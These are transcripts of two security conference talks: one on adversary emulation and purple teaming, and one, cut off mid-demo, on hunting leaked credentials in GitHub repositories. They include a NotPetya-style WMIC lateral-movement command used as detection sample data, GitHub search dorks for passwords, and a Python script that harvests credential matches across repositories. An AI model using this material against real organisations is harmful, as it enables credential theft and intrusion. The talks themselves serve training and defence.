10.5446/54351 (DOI)
|
Hello everyone, and welcome to my presentation. My name is Samuel Kimmons, and my talk is titled "Look at Me, I'm the Adversary Now: An Introduction to Adversary Emulation and Its Place in Security Operations." Before I jump into the overview, I want to give a big shout out to the Adversary Village; I'm very excited to speak to all of you attending today. A quick overview of what I'll cover: the typical "who am I" slide, an introduction to adversary emulation and the types of emulation (yes, I believe there is more than one type), where adversary emulation fits into security operations, threat intelligence's place in adversary emulation, emulation for detection testing and purple teaming, emulation as a training tool, and finally some resources so you can get started with adversary emulation today, followed by the conclusion. Who am I? My name is Samuel Kimmons, as I mentioned. I'm currently a red teamer at Cognizant. I was formerly at Recon InfoSec, where I focused 100 percent on adversary emulation: replicating TTPs, malware, and C2. I consider myself a purple teamer and adversary emulator at heart. Before Recon InfoSec, I was in the United States Air Force; I started out as a sys admin / help desk type person, moved up to SOC analyst, and then on to pen testing, red teaming, and adversary emulation. Where I got tuned in on adversary emulation and where it could fit into security operations was my time between SOC analyst and red teaming: I started to really dig into TTPs, how they affected an environment, and what kinds of behaviors we could look for, and from the offensive side, how I could replicate those behaviors to help my organization. You can find me on Twitter at valcott_k or on GitHub at valcan/k. The quick disclaimer that everyone has to throw out: thoughts and opinions expressed in this talk are my own and do not represent those of my employer. Let's jump into what adversary emulation actually is. You might be thinking, isn't that just red teaming? Hint: it isn't. It may be performed by red teams or pen testing teams, depending on what your organization has, but adversary emulation falls under the broader umbrella of offensive security; it has its place, and different teams may conduct those types of operations. To me, the act of adversary emulation is being as true as possible to the threat intelligence when conducting offensive operations, because without threat intelligence you don't really have adversary emulation; at that point you're doing threat emulation or your standard adversary simulation. You're going to hear me repeat "threat intel" throughout this talk, because it's very important to this topic. There are two primary types of emulation that I consider important. First, adversary emulation, where we're replicating a known threat actor's TTPs or behaviors, based on threat intelligence. An interesting point I like to bring up, from a blog post by the former red team lead at Walmart, is that we are essentially just copycats, because we can only emulate a threat actor to a certain degree.
That's typically because we only have a certain amount of threat intelligence on a threat actor's behaviors. This isn't uncommon: unless you have a view into an adversary's entire kill chain, you're probably not going to be able to replicate it 100 percent. To be honest, that's okay, as long as you're getting a benefit out of the TTPs or behaviors that you are able to replicate in your specified scenario. The other type is threat emulation. This one is one of my favorites too, because you're not focused on a particular threat actor; you're focused on emulating a TTP. Let's say we go to the MITRE ATT&CK matrix and select WMIC for lateral movement, and we want to replicate that TTP in our environment to determine whether our detections are capable of detecting or preventing that type of activity. It's not tied to a specific threat actor. Several threat actors, or a cluster of threat actors, may use the technique, but they're not really important to us. When we talk about adversary emulation and threat intelligence, we're usually doing that because a threat actor has been known to target our organization, and we want to be able to replicate what they can do in our own environment. So where does it fit into security operations? In my mind, it fits into the processes and people side of security ops. Typically you'd see SecOps broken down into three pieces: processes, people, and technology. I'm going to focus on the processes and people side because, honestly, the technology changes, while the people and processes grow and continue to change with time; it's the methodologies that should stay solid from one tool to the next. From a defensive perspective, regardless of which log analysis tool you're using, whether Splunk or a different SIEM, you should still be able to look for the same types of behavior, just using different syntax. The methodologies are there; only the tools change. On the processes side of security, processes need development, testing, and refining. You may be thinking, where does adversary emulation fit into this portion of SecOps? In my mind, it fits into purple teaming perfectly, because you're able to test those response procedures and also train your folks against specific adversarial TTPs. That's great for anyone ranging from a Tier 1 SOC analyst all the way up to a Tier 3 SOC engineer or threat hunter; everyone needs exposure to these types of TTPs, and we can provide that through purple teaming. I've already bled into the people side of security ops while talking about processes, because you don't have the processes without the people. People need ways to improve and test their skills, and I believe that training through adversary emulation exercises is one of the best ways to do this. You may be thinking, what about traditional red versus blue exercises? Typically those are objective focused: the red team has an objective they're trying to accomplish, and it may not necessarily be to train the blue team. Sure, overall it's to make the security posture of the organization better, but that may not be their primary objective.
When you throw in an adversary emulation exercise, they become much more natural sparring partners, working in tandem to improve each other's skill sets while improving the overall security posture of the organization. So which type of emulation is the right one? To me, you follow a simple formula for success. First, determine whether this will be for the processes or the people side of security ops, and ask yourself the following three questions. Number one: are you trying to detect or defend against a specific threat actor's TTPs or behaviors? In my mind, this leans toward adversary emulation, because we're focused on a specific threat actor, their TTPs, and their behaviors. Number two: are you simply wanting to improve your detections against general TTPs? Now we're leaning toward the threat emulation / adversarial simulation side of offensive security, where we're focused on improving the detections of our detection and response team, as opposed to trying to stop or detect a specific threat actor. These go back and forth; we can apply adversary emulation here as well, but we're more focused on the TTP rather than who the threat intel says it's tied to. Number three: are you wanting to train your defenders? If so, you can apply a variation of the previous questions to the scenario. For example, we could say we want to emulate a specific threat actor because we want our defenders to have exposure to them, since they're known to target, say, our organization, a finance organization. But we're also testing our detections against TTPs. Sure, they may not be specific to the threat actor we're trying to detect, but by combining the two we can have a great exercise that benefits both the processes and the people, because we're testing response procedures and improving the skills of our defenders. You may be wondering, since I keep mentioning threat intelligence for adversary emulation, where does it fit into these questions? Well, for number one, without threat intelligence we don't have adversary emulation. Even for number two, sure, we're talking about detecting general TTPs, but if we look at something like Red Canary's report on the top TTPs, we can see that several threat actors are using them, and that's based on threat intelligence collected in the field or in the organizations they're defending. So where does threat intelligence fit into adversary emulation? I've mentioned this several times: you can't accurately replicate a threat actor without threat intelligence. Threat intelligence allows us to get as true as possible to an adversary's actions. And as I said in the first two or three slides, you may not be able to get to the 100 percent mark, and that's okay. If we're aiming at replicating a threat actor's C2, we might be able to do that with open source or custom-developed tools. If we're talking about endpoint analytics, we can probably replicate enough to generate those types of logs or events. We may not be able to replicate the exact programming language a threat actor uses if we don't have that threat intelligence, and that's okay too. But emulating an adversary who is known to target your organization is much more valuable than standard threat emulation.
That goes for adversary simulation as well, the kind your typical red team would do. That's okay, because they're focusing on specific objectives; they may not be tying threat intelligence into their operations, and while they may happen to cover some of the TTPs a threat actor might use, if those aren't tied to an actor that might target your organization, it can throw off the importance of the findings. So let's talk about emulation for detection testing and purple teaming. First I'll cover my view of the purple team methodology; I'm sure it's a pretty common one. We start by selecting a TTP or an adversary TTP, so we can apply both threat emulation and adversary emulation to this purple team engagement. All parties involved formulate a plan of action, execute their plan of action, and validate their findings, then move on to the final step, which isn't really final because it's a continuous process: if there's no detection, they either tune or create one and start again. Let's look at a more detailed version of the purple team methodology. We'll start with the TTP: lateral movement via WMIC, because APT X uses this method and happens to target our organization, so we want to be able to detect and possibly prevent that type of activity. In the development stage, both the offensive and defensive teams develop their capabilities: the offensive team develops the TTP based on threat intelligence, and the defensive team develops a signature based on threat intelligence, if one is available. Testing is key, because all teams need to execute their plans of action; if the offensive team executes its plan and there's no response from the defensive team, we may be in trouble, and we may need to go back to the beginning of the wheel and redevelop our plan. The validation stage is really important because it goes several ways: the offensive team determines whether they were able to successfully execute their task, and whether the blue team was able to successfully detect it. Those are very important to keep in mind when doing purple teaming with adversary emulation. If it was detected, we can move on to the next TTP; if it wasn't, we start the cycle from the beginning, where the detection team develops or tunes the signature. You're probably thinking this seems like a lot of work, very resource- and process-intensive, and it can be, depending on what you're trying to replicate from a specific adversary, tool set, or piece of malware. And yes, it can be automated. It will take a little development, or purchasing a specific tool that allows you to automate it; I won't name any, because there are plenty out there. Even using the local resources you have, the offensive team could add the payload or technique to a script, say a PowerShell script if we're in a Windows environment, and the defensive team can execute it whenever they'd like to improve that detection. It goes both ways, too: we can automate a lot of the defensive piece using a tool like a SOAR. Once the offensive team develops the TTP, they feed it into the SOAR, and we have another method of automating it.
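To make that automation idea concrete, here is a minimal sketch, not a tool the speaker describes, of wrapping a TTP in a script so the defensive team can re-run it on demand and log each execution for later comparison against their detections. The catalogue entry, stand-in command, and output file name are all placeholders.

```python
#!/usr/bin/env python3
"""Sketch: scripting a purple-team TTP execution so it can be replayed on
demand and tracked. Everything here (technique entry, command, file name)
is illustrative, not part of any tool mentioned in the talk."""
import csv
import datetime
import os
import subprocess

# Hypothetical catalogue of TTPs the teams agreed to test.
TTPS = [
    {
        "id": "T1047",
        "name": "WMI lateral movement (benign stand-in)",
        # A harmless local command stands in for the real technique here.
        "command": ["whoami"],
    },
]

def run_ttp(ttp):
    """Execute one TTP and return a result row for the tracking sheet."""
    started = datetime.datetime.utcnow().isoformat()
    proc = subprocess.run(ttp["command"], capture_output=True, text=True)
    return {
        "technique": ttp["id"],
        "name": ttp["name"],
        "executed_at": started,
        "exit_code": proc.returncode,
        # The analyst fills this in after checking the SIEM/SOAR.
        "detected": "",
    }

if __name__ == "__main__":
    rows = [run_ttp(t) for t in TTPS]
    write_header = not os.path.exists("purple_team_runs.csv")
    with open("purple_team_runs.csv", "a", newline="") as fh:
        writer = csv.DictWriter(fh, fieldnames=rows[0].keys())
        if write_header:
            writer.writeheader()
        writer.writerows(rows)
    print(f"Logged {len(rows)} TTP execution(s) to purple_team_runs.csv")
```

The same loop could just as easily be triggered from a SOAR playbook, which is the automation path mentioned above.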
To break down the threat intelligence piece of developing this purple team adversary emulation exercise: we're starting with WMIC for lateral movement, which is technique T1047 from the MITRE ATT&CK matrix; you can see the link on screen. What do you know, NotPetya happens to use it. It may not be tied to a specific threat actor, and that's okay; we're covering a pretty broad technique, one of the top methods for lateral movement. And at reference number three we see "New Ransomware Variant 'Nyetya' Compromises Systems Worldwide", which also covers this technique. If we look into the threat intelligence available on MITRE ATT&CK, that blog from Talos Intelligence shows us the exact command this malware uses to execute commands remotely on another system. This type of intelligence is great for adversary emulation on both the offensive and defensive side. On the offensive side, we already have the command ready to go; we may need a little development so it runs in our specific environment. The defensive side is also ready to go, because they can build signatures around those specific command line parameters. There may be some obfuscation that can take place, but that's why the continuous loop happens in purple team engagements with adversary emulation: we can feed that back through and build new signatures or look for those detections. When you're first starting out with adversary emulation for purple teaming, it can be tough to keep track of the TTPs you want to write signatures for, and honestly a simple spreadsheet like this can help you get started: document the TTP, whether we have a signature for it, whether we've tested it, whether it's high or low priority, any relevant threat intelligence (key for adversary emulation), and the date we'd like to test it. It's as basic as it gets, low on resources, and it helps you keep track of what you need to test. Now, adversary emulation as a training tool; this falls more on the people side of security ops. I've mentioned this several times because it's really important: giving your defenders exposure to threat actor TTPs and behaviors matters, because when they see that activity in a training situation, like some of these public and private trainings, and then happen to see it in their own networks, it helps them clue in on what to pivot on, or know what normally comes after a given TTP. For example, once a threat actor drops a payload and starts enumerating Active Directory, they might be looking to move laterally. If we catch it at that point from a defensive standpoint, we can say, okay, let's look for lateral movement techniques, and what do you know, we just talked about one using WMIC, so let's look at that for potential movement across the network. I mentioned there's public and private training for this. A lot of it happens at DEF CON, Black Hat, and other conferences, or you can talk to those companies individually. On the free side (free to attend, though you might have to pay for the conference to get in) there are CTFs like OpenSOC. I'm a little biased, because I used to work at Recon InfoSec and did a lot of development on the OpenSOC CTF, which is run at DEF CON every year.
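Going back to the T1047 example for a moment, here is a minimal sketch of the kind of command-line signature the defensive side could build around those WMIC parameters. The regex and the sample events are illustrative assumptions, not a production detection; obfuscation or alternative tooling would need additional rules.

```python
#!/usr/bin/env python3
"""Sketch of a command-line signature for remote WMIC process creation
(MITRE ATT&CK T1047). The regex and sample events are illustrative only."""
import re

# Flag wmic invocations that target a remote node and spawn a process.
WMIC_LATERAL = re.compile(
    r"wmic(\.exe)?\s+.*?/node:\S+.*?process\s+call\s+create",
    re.IGNORECASE,
)

sample_events = [  # stand-ins for process-creation logs (e.g. Sysmon Event ID 1)
    'wmic /node:"10.0.0.5" /user:"corp\\admin" process call create "rundll32.exe c:\\perfc.dat #1"',
    "wmic cpu get name",  # benign local query, should not match
]

for cmdline in sample_events:
    verdict = "ALERT" if WMIC_LATERAL.search(cmdline) else "ok"
    print(f"{verdict}: {cmdline}")
```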
Coming back to OpenSOC: it's one of the best ways to get exposure to real adversary emulation, because when I was doing it, I had to develop the same exact payloads and malware that the threat actor might use. Then there's Boss of the SOC from Splunk. Obviously the Splunk tool isn't free, but there is a free-ish version you can use with the Boss of the SOC data set that's available, and the threat research team that puts it out is amazing; they put a lot of content out there to give you exposure to real-world TTPs. While it may be focused on their tool set, as I mentioned before, it's the methodologies that are key, not the tools, so you can take those same concepts and bring them over to Graylog or another tool. Then we have something like NetWars from SANS. It costs a bit to try out, but it gives great exposure to a general set of TTPs, not specifically tied to a threat actor; it's great if you're first starting out and want exposure, or want to try some of those offensive TTPs yourself. And there are hundreds of CTFs that go on every year; check out ctftime.org, there's probably one going on every single weekend this year. While a lot of them are focused on hacking your way through a crazy puzzle, they're a great way to get familiar with the tool sets and methodologies of conducting exploitation or moving laterally, and you can then apply those to your actual offensive engagements where necessary or possible. Now, my favorite slide in the talk, because this is where I give you the resources to get started. Let's talk about labs. Labs can be a controversial thing, because either you have a lot of resources to build one or you have very minimal resources, so I tried to choose a range of options that can be done on multiple types of systems, with resource limitations in mind. DetectionLab is more on the higher-resource end, because it pulls down several images, a domain controller, and I believe they even put a SQL server in there recently. Within the last year I think the developers have even been working on a PrintNightmare box as well, putting that exploit in there so you can actually exploit it, test, and see what it looks like. The cool thing about DetectionLab is that it lets you spin up that environment, look at the logs, do some detection engineering, or get familiar with different attacks. Keep in mind that it downloads several images and ISO files, which can take quite a while depending on your internet connection, so keep that and your hard drive space in mind. Then we move on to Splunk's Attack Range. The Splunk team does an amazing job of developing different TTPs, and they have a way of incorporating Atomic Red Team from Red Canary. It's a great way to get exposure to new techniques that are out there, or to help build your own detections if your company happens to use Splunk. But as I mentioned before, Splunk isn't the be-all and end-all, because those same methodologies carry over to a different data analysis tool. And the best place to start, if you're just getting started or simply want to test something before you run an operation, is a few virtual machines and a log analysis tool: a Windows 10 box and a HELK server from Cyb3rWard0g, very minimal.
I think there's a four-gig configuration you can run to feed those logs into an ELK stack, so you can actually analyze what your activity is doing in an environment. That's about the most basic way; I think you can get away with maybe eight gigs of memory across the two or three OSes running at the same time. Keep that in mind when you're building out a server or system so you can do this type of adversary emulation testing on your own. Now let's talk about the tools that feed into those labs, or the custom lab you happen to build. We mentioned Atomic Red Team from Red Canary. The developers on that are super active and all amazing; I suggest you check out their Slack channel and of course their GitHub repo. They seem to always be adding new TTPs to the tool set, and I really suggest you take it, throw it in your lab, and get familiar with different TTPs and different MITRE ATT&CK techniques. Especially if you're on the defensive or detection engineering side, it's a great way to get exposure without having to worry about getting your hands on the latest and greatest C2 tool or malware, because when it comes down to it those are just replicating specific TTPs, and you can do that with Atomic Red Team. If you want to get a little more adventurous, you can look at CALDERA from MITRE. Recently they've put more development time into it and it's becoming a great tool; it's kind of a pseudo red team tool that lets you build a binary payload, throw it on a target host, and execute commands through that payload, just like you would with C2 tools like Cobalt Strike, PowerShell Empire, or Mythic. The other option is custom development, which I mentioned in an earlier slide when talking about whether this can be automated. Yes: using custom development, your offensive team, even if it's your pen testing team and you don't have a red team, can develop custom tools or scripts to run these adversary emulation exercises in your lab or in your production environment. Obviously be smart about what you're doing, but you can run them in your detection environment to build detections or help refine those processes using the purple team methodology we talked about. On my GitHub I put a script that will help you automate a lot of this if you're going for that simple few-virtual-machines setup, like a Windows 10 box, an Ubuntu server for logging, and maybe a Kali box as an attack host. The script will download Sysmon and Winlogbeat, help you set up forwarding of all the logs, and also download Atomic Red Team, so you're good to go: all you have to do is import Invoke-AtomicRedTeam, run the TTP you want to run, and you have logs shipping to your HELK or ELK stack, depending on what you set up. Keep in mind the resources can be intensive depending on what you're trying to do. Some great references to help you get started with threat intelligence for adversary emulation: first off, MITRE ATT&CK. You'll hear about it all day, every day, at every conference you go to and in every blog post you see, but it's very important because it breaks down TTPs in a readable manner.
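On the Atomic Red Team lab setup described a moment ago, here is a small sketch of kicking off a single atomic test from Python once PowerShell and Red Canary's invoke-atomicredteam module are already installed on the lab box (that installation, and running this on a Windows host, are assumptions; the technique ID is just the T1047 example from earlier).

```python
#!/usr/bin/env python3
"""Sketch: driving an Atomic Red Team test from Python on a lab box.
Assumes powershell.exe and the invoke-atomicredteam module are present."""
import subprocess

TECHNIQUE = "T1047"  # WMI-based execution, the example used in this talk

# -ShowDetails first, so you can read what the test will do before running it.
ps_command = (
    f"Import-Module invoke-atomicredteam; "
    f"Invoke-AtomicTest {TECHNIQUE} -ShowDetails"
)

result = subprocess.run(
    ["powershell.exe", "-NoProfile", "-Command", ps_command],
    capture_output=True,
    text=True,
)
print(result.stdout or result.stderr)
```

Dropping the -ShowDetails switch would actually execute the test, which you would only do in the lab or detection environment described above.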
Coming back to MITRE ATT&CK: they're also great about including threat intelligence to back up those TTPs, and that's a great pivot point when it comes to threat research: I found my TTP, I found related intelligence, and now I'm going to keep searching for that type of intel or for the threat actors that might actually use these TTPs or tools. My favorite one isn't really a MITRE ATT&CK-style website; it's called Malpedia, and it's one of my favorite places for threat intelligence gathering because you simply search for the malware, C2, or threat actor you're interested in. For this one I looked at Petya and came up with EternalPetya. It shows you which families it's part of and links different blog posts and reports from different vendors, the open source ones you can access without paying for a subscription. It's an amazing place. I don't believe it's easy to get an account there, but a lot of the content is free; you just go to the search page and start typing away. I used it all the time, and I still do, when I'm interested in finding out how to replicate a specific threat actor, because a lot of the time when you go to something like the MITRE ATT&CK matrix, they'll have four or five references at the bottom. Honestly, that's not enough when you're building out a full campaign or a full purple team operation using adversary emulation, or simply when you want to train your defenders against a multitude of a threat actor's TTPs. One report from the ATT&CK matrix might give you one or two TTPs; come over to Malpedia and you'll probably find 10 to 15 different articles or blog posts about a specific threat actor and information surrounding their objectives. That's something else I haven't mentioned: when you're doing adversary emulation, you want to be objective focused, just like you are with red team engagements, because the adversary has an objective. It could be to gain access simply to sell that access, or to gain access to ransom your data, or to collect your data and sell it somewhere else. There's always an objective in mind, and it's most likely financially motivated, so keep that in mind when you're doing your research. Okay, so my favorite part, in addition to the resources slide, is how you can get started. I gave you the resources to get started on a lab, and to get started with some pseudo adversary activity using Red Canary's Atomic Red Team and MITRE's CALDERA, and then of course custom development, because I always encourage that; the best way to learn is to get your hands on the code and start writing these TTPs yourself. Even if it's simply a WMIC process call create on the target host, that's enough to get started. The three steps I like to include when I'm building an adversary emulation scenario: first off, threat intelligence is key. I've mentioned that several times because it is key; you don't have successful adversary emulation without threat intelligence. So step one, we select our threat actor and our relevant threat intel. We're going to pick APT X, and we're going to go to MITRE ATT&CK.
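As a hedged illustration of that first step, here is a sketch of pulling the techniques ATT&CK attributes to a group programmatically from MITRE's public STIX bundle. "APT X" is a placeholder, so the group name below is hypothetical, and the bundle URL and field names are assumptions worth verifying against the cti repository before relying on them.

```python
#!/usr/bin/env python3
"""Sketch: listing the ATT&CK techniques attributed to one group, by walking
the public enterprise-attack STIX bundle. Group name and URL are assumptions."""
import requests

ATTACK_JSON = (
    "https://raw.githubusercontent.com/mitre/cti/master/"
    "enterprise-attack/enterprise-attack.json"
)
GROUP_NAME = "FIN7"  # substitute the actor known to target your organization

objects = requests.get(ATTACK_JSON, timeout=120).json()["objects"]
by_id = {o["id"]: o for o in objects}

# Find the intrusion-set object for the group, then follow "uses" relationships
# to the attack-pattern (technique) objects it points at.
group = next(
    (o for o in objects
     if o.get("type") == "intrusion-set" and o.get("name") == GROUP_NAME),
    None,
)
if group is None:
    raise SystemExit(f"group {GROUP_NAME!r} not found in the bundle")

for rel in objects:
    if (
        rel.get("type") == "relationship"
        and rel.get("relationship_type") == "uses"
        and rel.get("source_ref") == group["id"]
        and rel.get("target_ref", "").startswith("attack-pattern--")
    ):
        technique = by_id[rel["target_ref"]]
        ext_ids = [
            ref["external_id"]
            for ref in technique.get("external_references", [])
            if ref.get("source_name") == "mitre-attack"
        ]
        print(ext_ids[0] if ext_ids else "?", "-", technique["name"])
```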
On the ATT&CK page, we'll look at the specific references they have and what TTPs the group happens to use, then hop over to Malpedia and look for further articles or blog posts about interactions with these threat actors in different environments: what they do when they're in an environment and what their objectives are. Then we move on to step two. This is the most resource-intensive part, depending on what you're trying to replicate; if you're trying to replicate a threat actor's specific malware or C2, depending on the capabilities of your team, this could take real effort. In this step we develop and replicate those TTPs. If it's a simple command line action, that's easy, it comes straight from the threat intel and we just need to modify it a little. If it's an actual payload, that may take some time, so keep that in mind if you're trying to be time sensitive. Then step three, we execute our actions, and depending on whether we went for a purple team operation or simply giving our defenders exposure to these actions, this is the final step. When you add all three of these together, you get successful adversary emulation. And I'll mention it again because it's very important: threat intelligence is the key to successful adversary emulation. Okay, I just want to give another big shout out to Adversary Village and all of the people watching today. Thank you so much for attending my talk. My final parting thoughts on adversary emulation: it can help you improve the overall security posture of your organization through testing and validating capabilities, or simply by improving the people behind the processes, because when it comes down to security ops, the defensive side of security, and even the offensive side, the people are the most important, and they need to be able to refine the processes that help them defend their organizations. So once again, thank you so much.
|
Adversary Emulation is quickly becoming a hot topic in information security, and there is a good reason for it. Security analysts, threat hunters, and incident responders are constantly facing an onslaught of old and new threats. How can defenders properly prepare for the ever-changing threat landscape, improve their skill set, and improve the security posture of their organization? In this presentation I'll answer those questions by covering: The various forms of Adversary Emulation, where/how it fits into Security Operations, Threat Intelligence, the benefits of using it as a Blue Team training tool, and how to get started!
|
10.5446/54354 (DOI)
|
Hello everyone, welcome to the talk Red Team Credentials: Old with a Twist. This talk is presented at DEF CON 29, Adversary Village. About me: my name is Shantanu Khandelwal. I am a cyber security manager at KPMG. I enjoy working in cyber security and have been working in this industry for almost five years now. My journey started with my master's degree in cyber security and incident response. I also have some certifications like OSEP, OSCE, OSCP, etc. This is my first talk at DEF CON, so hopefully everything will go fine. The disclaimer: the opinions expressed in this presentation and on the following slides are solely those of the presenter, that's me, and not necessarily those of KPMG. KPMG does not guarantee the accuracy or reliability of the information provided herein. Okay, so that's done. In this talk we are going to walk through a basic introduction to GitHub, a description and a small walkthrough of current GitHub reconnaissance methodologies, and some drawbacks of these methodologies. Then I'm going to introduce a tool I wrote named Cred Stroller, do a walkthrough of it, and talk about some future work that can be done to improve the tool as well. So why are we here? Before we start this talk, I want to go over reconnaissance quickly and how it fits into an adversary simulation or emulation methodology. Reconnaissance is the first step in the kill chain, as we know. As red teamers, we often do it before the initial compromise phase, and everybody keeps saying that information gathering, or reconnaissance, is the most critical step; it is certainly one of the most critical steps. What is reconnaissance? Generally we use it to refer to finding emails, subdomains, IP ranges, leaked passwords, etc. for the target organization. In this talk we are going to focus on sensitive data exposure via GitHub. So what is GitHub? As per Wikipedia, it is a provider of internet hosting for software development and version control using the command line tool Git. Developers use GitHub for storage, sharing projects, collaboration, data transfer, etc. From an adversary's perspective, GitHub is a gold mine. Its mass usage makes it a prime target, and developers often use GitHub and unknowingly commit proprietary source code or credentials to their repositories. Interesting information in repositories: we can find critical information inside GitHub repositories like usernames, passwords, keys, email addresses, subdomains, even proprietary source code, and we can also identify the software stack from there. In this talk we are going to focus on the credentials part. One of the ways we do GitHub reconnaissance is manual reconnaissance. Searching for the company name and then "password" will find stored passwords in configuration files. Searching for the company name and "connection string" will find database credentials. You can also look for SSH passwords using the keyword ssh2_auth. SendKeys is my personal favorite: it can find you automation scripts used by testers, who are sometimes not security savvy and commit passwords to the Git repositories. There are also some dorks which you can use to find sensitive information; many researchers have blog posts on this. Here is one of the lists you can use, and you can find other lists as well. So here is the first demo.
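Before the demo, here is a small sketch of those manual dork-style queries expressed programmatically. The keyword list simply mirrors the examples above, the target is the same demo domain used in the talk, and the search URL format is the ordinary GitHub web code search, which is an assumption worth checking against the current UI.

```python
#!/usr/bin/env python3
"""Sketch: building GitHub web-search URLs for the manual dorks above.
Target domain and dork keywords are just the examples from this talk."""
from urllib.parse import quote_plus

TARGET = "redteam.cafe"
DORKS = ["password", "connection string", "ssh2_auth", "SendKeys", "api_key"]

for dork in DORKS:
    query = quote_plus(f"{TARGET} {dork}")
    print(f"https://github.com/search?q={query}&type=code")
```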
Hopefully the demo will go well and then we can move forward from there. If I go to GitHub and search for redteam.cafe, you can see that there are 21 results. There are several repositories like test1, test2, domain fronting, etc. Let's see if we can use redteam.cafe plus the keyword password to look for passwords. If I search for passwords, we have now come down from 21 results to 5 results. We see passwords here, some web.config passwords, some Telnet passwords, and some SendKeys passwords in the automation scripts. We also see one result where redteam.cafe appears along with the word password, but that one is not related to credentials because it does not list any actual passwords. This is manual searching: you can use password, API, or any other keywords you like to search for passwords or secrets. I don't see any API keys being exposed here, there are none, but we could use other keywords as well. I just want to bring your attention to one thing I mentioned very briefly: there are two or three repositories coming up, test1, test2, and some others. Keep the test1 and test2 repositories in mind, as these have been uploaded and designed to showcase the real impact of the Cred Stroller plugin, which we will discuss later. That's the end of the first, manual reconnaissance demo. Coming back to our slides: in the manual reconnaissance we saw that we can find passwords, like here: there are SendKeys passwords, web.config passwords, and FTP passwords. Moving forward, a question comes to mind: are we losing some of the data, or are we getting all of the passwords leaked by redteam.cafe? Think about how GitHub search works: if you put two keywords, such as the company name and password, in the search bar, we are finding the results in which both keywords appear, so one file must contain both the company name and the word password. There were also results which had just the word password but contained no actual passwords; keep that in mind. Another approach to searching for passwords is the automated approach, using the current tools, namely TruffleHog, git-secrets, GitScan, etc. The disadvantage of these tools is that they only search the repositories within an organization, for a specific user, or in a specific repository. Why is this the case? Because GitHub does not currently allow you to search all of its repositories using the API. Previously it was allowed, but it has been disallowed because of abuse of the API for searching passwords inside repositories; that kind of global keyword search via the API has been discontinued for, I think, two years now. These tools still work because GitHub does provide search inside an organization, inside a user's repositories, or inside one specific repository. Let's quickly do an automated reconnaissance demo and then we can go to the new tool I have developed and look at that as well. Here I am using TruffleHog. With TruffleHog we can search for credentials: I run trufflehog, provide the regex option, and then I can go and take one repository.
I will take test1, pass it in as the argument, and if I hit enter it will search inside that repository and find me passwords. I can see that it has only found me one password here, which is also not very visible; it only shows high entropy, etc. You can already see that in the manual reconnaissance we found more passwords. I may be running this tool wrong, I'm not too sure, but I can definitely tell you that I have used many other tools and they will not always find you all of these results; some of them will miss something or other. This was a very small demo of the current tools. If the TruffleHog author is watching, please let me know how to use this tool properly. Moving forward, we saw in automated reconnaissance that it barely finds one password. Even if it found all the passwords, we would have to give it all of these repositories line by line, and it becomes difficult to enumerate them, because if you are searching a very big organization you will have hundreds of repositories, and providing hundreds of repositories on the command line will be very difficult. Finding passwords like this, which are not well highlighted, is difficult as well. This brings us to Cred Stroller, yet another GitHub search tool. Cred Stroller is developed by me. It is an automated reconnaissance tool, a Chrome plugin written in JavaScript. Cred Stroller searches for the company name first, and after that search completes it actually goes inside each of the repositories which mention the company name and then searches for passwords inside those repositories. Cred Stroller also allows you to do a regex search; the regex matches are presented as "lucky results". Why do we need Cred Stroller? It searches for credentials using regexes, and GitHub does not allow you to search with regexes, which is one of the major advantages. It searches inside the repositories after matching the company name, and then you can go and search for the keywords. It has two types of results: all results and lucky results. The lucky results are based on a customizable regex. It is very easy to deploy and does not need any expertise; it's a Chrome plugin, so it's very easy to use as well. Both blue teams and red teams can use it: blue teams can use it to monitor leaked credentials for their organization, while red teams can use it to search for credentials across many repositories. The search is in depth, and it will find more passwords than just searching for two or three keywords. It also has the advantage that it runs in the background: once it starts, you can come back at a later stage and see all the results, which is particularly useful if the search results for the company name you are searching are very large. How does Cred Stroller work? Think of it as sitting in your browser. Once you open your browser and use Cred Stroller, it searches GitHub using the UI to get the repositories; the UI search is for the company keyword. Once it gets the repositories, the repositories are sent to the API to search for the keywords. Once the keywords are searched, all the search results are stored in "all results". Up to this point, no regular expression has been applied: if a file contains a getPassword method, all results will have that getPassword method in the output.
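Here is a rough Python re-creation of the two-stage flow just described, including the regex filtering explained next. Cred Stroller itself is a JavaScript Chrome plugin, so this is only an illustration; the token, keyword list, and "lucky" regex are placeholders, and GitHub's search API is rate limited, so a real run needs throttling and pagination handling.

```python
#!/usr/bin/env python3
"""Sketch of the Cred Stroller flow: repo search by company keyword, then a
scoped code search per repo, then a local regex pass for "lucky" hits."""
import re
import requests

TOKEN = "ghp_..."                 # a GitHub personal access token (placeholder)
COMPANY = "redteam.cafe"
KEYWORDS = ["password", "secret"]
LUCKY = re.compile(r"(password|passwd|pwd)\s*[:=]\s*['\"]?[^\s'\"]{4,}", re.I)

session = requests.Session()
session.headers.update({
    "Authorization": f"token {TOKEN}",
    "Accept": "application/vnd.github+json",
})

# Stage 1: repositories whose content mentions the company name.
repos = session.get(
    "https://api.github.com/search/repositories",
    params={"q": COMPANY, "per_page": 20},
).json().get("items", [])

# Stage 2: scoped code search inside each repository.
for repo in repos:
    for keyword in KEYWORDS:
        hits = session.get(
            "https://api.github.com/search/code",
            params={"q": f"{keyword} repo:{repo['full_name']}"},
        ).json().get("items", [])
        for item in hits:
            print("all result:", repo["full_name"], item["path"])
            # "Lucky" filter: fetch the raw file and grep it locally.
            raw = session.get(item["url"]).json().get("download_url")
            if raw and LUCKY.search(session.get(raw).text):
                print("  lucky result ->", raw)
```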
After all of these results are gathered, they are filtered using the regexes, and then we get the lucky results. Lucky results are basically a subset of all the results; they come from all the results after applying the regular expressions. That's a lot of talk already, so let's see the demo and hope it works. Let's go back to GitHub again. I hope everything is visible; maybe I can increase the font size. If you click on the Cred Stroller plugin, which I have installed here, there are many buttons, and I will go through all of them. Of course, Submit Search is for the searching. All Results shows, as I mentioned previously, all of the results. The I'm Feeling Lucky button is for the lucky results. You have two buttons for clearing the results and the lucky results, and you have save configuration and load configuration as well. These two fields are for the tokens; I will explain later what these tokens are, or maybe you already know GitHub tokens and the GitHub username. These two buttons give you the default search keywords and the default regex, which you can modify as you like. Today I have modified it to use only two keywords and kept the same regex. I will put redteam.cafe here. What this will do is search for redteam.cafe as a company name across all of the GitHub repositories. Once it finds those repositories, it will go and search for all these keywords, which I have separated by commas, inside all of the files in the repositories it found. Then it will parse them with this regex and see if there are any lucky results, which will be saved in the lucky results, which we can see later. Let's quickly submit the search. The search takes a bit of time; it goes automatically through all of the pages, and once all of the searching finishes, it will stop. The searching from the UI has stopped, but the background mode is still working. To see the background mode working, we can come back to the Cred Stroller plugin and click on Show All Results. All results are, as I told you, all of the results: if the word password appears anywhere, you can see it here. Of course, this is a bit overwhelming; there are so many results, you can keep scrolling and they are still being added. You can find so much 